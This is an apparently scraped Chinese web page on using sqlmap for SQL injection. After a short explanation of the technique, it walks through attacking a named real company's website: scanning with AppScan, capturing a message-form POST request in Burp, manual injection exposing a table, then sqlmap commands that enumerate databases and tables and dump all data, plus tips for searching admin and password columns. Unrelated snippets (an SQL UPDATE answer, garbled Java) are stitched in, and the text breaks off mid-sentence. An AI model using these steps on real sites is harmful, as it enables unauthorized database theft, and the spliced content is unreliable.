sqlmap怎么批量进行sql注入

sqlmap怎么批量进行sql注入,第1张

1什么是SQL注入?
SQL注入是一种代码注入技术,过去常常用于攻击数据驱动性的应用,比如将恶意的SQL代码注入到特定字段用于实施拖库攻击等。SQL注入的成功必须借助应用程序的安全漏洞,例如用户输入没有经过正确地过滤(针对某些特定字符串)或者没有特别强调类型的时候,都容易造成异常地执行SQL语句。SQL注入是网站渗透中最常用的攻击技术,但是其实SQL注入可以用来攻击所有的SQL数据库。在这个指南中我会向你展示在KaliLinux上如何借助SQLMAP来渗透一个网站(更准确的说应该是数据库),以及提取出用户名和密码信息。
2什么是SQLMAP?
SQLMAP是一个开源的渗透测试工具,它主要用于自动化地侦测和实施SQL注入攻击以及渗透数据库服务器。SQLMAP配有强大的侦测引擎,适用于高级渗透测试用户,不仅可以获得不同数据库的指纹信息,还可以从数据库中提取数据,此外还能够处理潜在的文件系统以及通过带外数据连接执行系统命令等。
访问SQLMAP的官方网站可以获得SQLMAP更为详细的介绍,如它的多项特性,最为突出的是SQLMAP完美支持MySQL、Oracle、PostgreSQL、MS-SQL与Access等各种数据库的SQL侦测和注入,同时可以进行六种注入攻击。
还有很重要的一点必须说明:在你实施攻击之前想想那些网站的建立者或者维护者,他们为网站耗费了大量的时间和努力,并且很有可能以此维生。你的行为可能会以你永远都不希望的方式影响到别人。我想我已经说的够清楚了。
0x01 定位注入的网站
这通常是最枯燥和最耗时的一步,如果你已经知道如何使用GoogleDorks(Googledorkssqlinsection:谷歌傻瓜式SQL注入)或许会有些头绪,但是假如你还没有整理过用于Google搜索的那些字符串的话,可以考虑复制下面的条目,等待谷歌的搜索结果。

用语句就行了。你要改这个表的哪个字段啊。Update dual_info set A字段=B值 where step=C值这是更新语句,意思是更新dual_info表中的[A字段]为B值,条件是step字段为C值时。ABC三个要你自己替换掉

1

  此处附上网址 广东京溪园罐头食品有限公司

此网页功能并不是很多,先拿APPscan全盘扫一遍,漏洞确实不少
由于五个参数均有注点,任一点开一个找一下referer字段顺藤摸瓜来确定上一个请求网页
发现这个留言框  然后打开burp抓包验证一下是否是appscan测试出的注点(看一看请求包内容是否一致)
接下来改包测试 这里改一下name(post注入常用手法 'havingh 1=1)然后放包
直接报错,整条插入语句连带表wh_47book完全暴露,手工测试到这里已经完全OK,接下来sqlmap跑一波

由于post注入,点击copy to file直接生成数据包 并命名1txt 放在本机sqlmap目录下
打开sqlmap 输入sqlmappy -r 1txt测试是否可自动注入
接下来开始爆库 输入sqlmappy -r 1txt --dbs
接下来爆表 输入sqlmappy -r 1txt -D jingxiyuan_sunbo --tables
sqlmappy -r 1txt -D jingxiyuan_sunbo -T 数据表名 --dump   (爆出全部数据)

数据储存在我C:\Users\AA\AppData\Local\sqlmap\output\>uservo user=(uservo)voinfo;
String username=usergetUsername();
String password=usergetPassword();
Systemoutprintln("your username is "+username);
Systemoutprintln("your password is "+password);
List list = new ArrayList();

POST注入
有两种方法来进行post注入,一种是使用--data参数,将post的key和value用类似GET方式来提交。二是使用-r参数,sqlmap读取用户抓到的POST请求包,来进行POST注入检测。
查看payload
之前一直是加本地代理,然后用burpsuit来看sqlmap的payload,到现在才发现用-v参数就可以实现。一直认为-v实现的只是控制警告,debug信息级别。实际上使用-v 3就可以显示注入的payload,4,5,6还可以显示>

sqlmap从数据库中搜索字段语句

-D 数据库–-search -C admin,password

–dbms mysql -D baidu –-search -C admin,password

在baidu数据库中搜索字段admin或者password


欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/yw/13374777.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-07-24
下一篇 2023-07-24

发表评论

登录后才能评论

评论列表(0条)

保存